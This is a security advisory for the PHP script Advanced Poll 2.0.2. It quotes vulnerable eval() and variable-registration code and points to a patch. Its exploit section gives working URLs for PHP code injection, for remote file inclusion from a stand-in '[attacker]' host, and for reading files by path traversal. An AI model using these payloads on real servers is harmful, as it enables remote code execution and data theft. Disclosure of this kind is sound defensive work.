php.advanced.poll.txt

`Informations :  
°°°°°°°°°°°°°  
Language : PHP  
Product : Advanced Poll  
Version : 2.0.2 Textfile  
Website : http://www.proxy2.de  
Problems :  
- PHP Code Injection  
- File Include  
- Phpinfo  
  
  
PHP Code/Location :  
°°°°°°°°°°°°°°°°°°°  
  
comments.php :  
  
------------------------------------------------------------------------------------------------------  
[...]  
$register_poll_vars = array("id","template_set","action");  
  
for ($i=0;$i<sizeof($register_poll_vars);$i++) {  
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {  
eval("\$$register_poll_vars[$i] =   
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");  
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {  
eval("\$$register_poll_vars[$i] =   
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");  
} else {  
eval("\$$register_poll_vars[$i] = '';");  
}  
}  
[...]  
------------------------------------------------------------------------------------------------------  
  
  
  
booth.php, png.php :  
  
---------------------------------------------------------------  
<?php  
  
$include_path = dirname(__FILE__);  
if ($include_path == "/") {  
$include_path = ".";  
}  
  
if (!isset($PHP_SELF)) {  
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;  
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];  
if (isset($HTTP_GET_VARS)) {  
while (list($name, $value)=each($HTTP_GET_VARS)) {  
$$name=$value;  
}  
}  
if (isset($HTTP_POST_VARS)) {  
while (list($name, $value)=each($HTTP_POST_VARS)) {  
$$name=$value;  
}  
}  
if(isset($HTTP_COOKIE_VARS)){  
while (list($name, $value)=each($HTTP_COOKIE_VARS)){  
$$name=$value;  
}  
}  
}  
  
require $include_path."/include/config.inc.php";  
require $include_path."/include/class_poll.php";  
[...]  
---------------------------------------------------------------  
  
  
poll_ssi.php, popup.php :  
  
----------------------  
include "./booth.php";  
----------------------  
  
  
  
  
admin/common.inc.php :  
  
---------------------------------------------------------------  
[...]  
if (!isset($PHP_SELF)) {  
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];  
if (isset($HTTP_GET_VARS)) {  
while (list($name, $value)=each($HTTP_GET_VARS)) {  
$$name=$value;  
}  
}  
if (isset($HTTP_POST_VARS)) {  
while (list($name, $value)=each($HTTP_POST_VARS)) {  
$$name=$value;  
}  
}  
if(isset($HTTP_COOKIE_VARS)){  
while (list($name, $value)=each($HTTP_COOKIE_VARS)){  
$$name=$value;  
}  
}  
}  
  
$pollvars['SELF'] = basename($PHP_SELF);  
unset($lang);  
if (file_exists("$base_path/lang/$pollvars[lang]")) {  
include ("$base_path/lang/$pollvars[lang]");  
} else {  
include ("$base_path/lang/english.php");  
}  
[...]  
---------------------------------------------------------------  
  
  
In the /admin/ directory, in the files :  
  
- index.php  
- admin_tpl_new.php  
- admin_tpl_misc_new.php  
- admin_templates_misc.php  
- admin_templates.php  
- admin_stats.php  
- admin_settings.php  
- admin_preview.php  
- admin_password.php  
- admin_logout.php  
- admin_license.php  
- admin_help.php  
- admin_embed.php  
- admin_edit.php  
- admin_comment.php  
  
:  
  
------------------------------------  
[...]  
$include_path = dirname(__FILE__);  
$base_path = dirname($include_path);  
  
require "./common.inc.php";  
[...]  
------------------------------------  
  
  
misc/info.php :  
  
-------------------------  
<html>  
<head>  
<title>PHP Info</title>  
</head>  
<body bgcolor="#3A6EA5">  
<?php  
phpinfo();  
?>  
-------------------------  
  
  
Exploits :  
°°°°°°°°  
  
- if magic_quotes_gpc=OFF :  
  
http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//  
  
or with a POST form or cookies.  
  
- This will only work if register_globals=OFF (this is not an error...) :  
  
http://[target]/booth.php?include_path=http://[attacker] (or with png.php,   
poll_ssi.php, popup.php) will include the files :  
http://[attacker]/include/config.inc.php  
and  
http://[attacker]/include/class_poll.php  
  
- This will work if register_globals=OFF OR ON :  
  
http://[target]/admin/common.inc.php?basepath=http://[attacker] will include   
the file http://[attacker]/lang/english.php.  
  
The same hole can be found, in the /admin/ directory, in the files :  
  
- index.php  
- admin_tpl_new.php  
- admin_tpl_misc_new.php  
- admin_templates_misc.php  
- admin_templates.php  
- admin_stats.php  
- admin_settings.php  
- admin_preview.php  
- admin_password.php  
- admin_logout.php  
- admin_license.php  
- admin_help.php  
- admin_embed.php  
- admin_edit.php  
- admin_comment.php  
  
but only with register_globals=OFF.  
And, with register_globals=OFF and with all the files above again, the url   
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view   
will include the file http://[target]/admin/../../../file/to/view  
  
  
- http://[target]/misc/info.php will show the phpinfo().  
  
  
Solution/More details :  
°°°°°°°°°°°°°°°°°°°°  
Both patch and details can be found on http://www.phpsecure.info .  
  
  
Credits :  
°°°°°°°°  
frog-m@n  
http://www.phpsecure.info  
  
_________________________________________________________________  
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail  
  
`